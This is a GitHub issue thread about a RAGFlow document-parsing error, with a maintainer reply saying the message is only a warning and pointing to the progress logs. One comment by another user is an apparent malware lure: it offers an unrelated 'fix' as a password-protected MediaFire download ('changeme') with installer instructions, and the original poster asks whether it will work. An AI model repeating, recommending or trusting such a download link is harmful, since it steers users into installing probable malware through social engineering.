### ISSUE TITLE
[Bug]: Unable to parse document

### ISSUE THREAD

**Issue by eavin7456** [infiniflow/ragflow#2105]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Branch name

Unable to parse document

### Commit ID

c333

### Other environment information

```Markdown
ubuntu22.04

Supermicro server
```

### Actual behavior

Task has been received while parsing the document

![feedb8fc-d942-467e-891d-c508e5e0c3f6](https://github.com/user-attachments/assets/6d6b450d-5572-4b37-8322-b57d6a113e5d)

### Steps to reproduce

```Markdown
This error occurs every time I parse a document
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eavin7456** [comment]
> changeme

I am using Docker on Ubuntu system, does it work for me

**Comment by KevinHuSh** [comment]
This is just a warning message, you could ignore it.
Hover on the process bar that shows the percentage of parsing progress, you will see the logs which might tell what the error is.
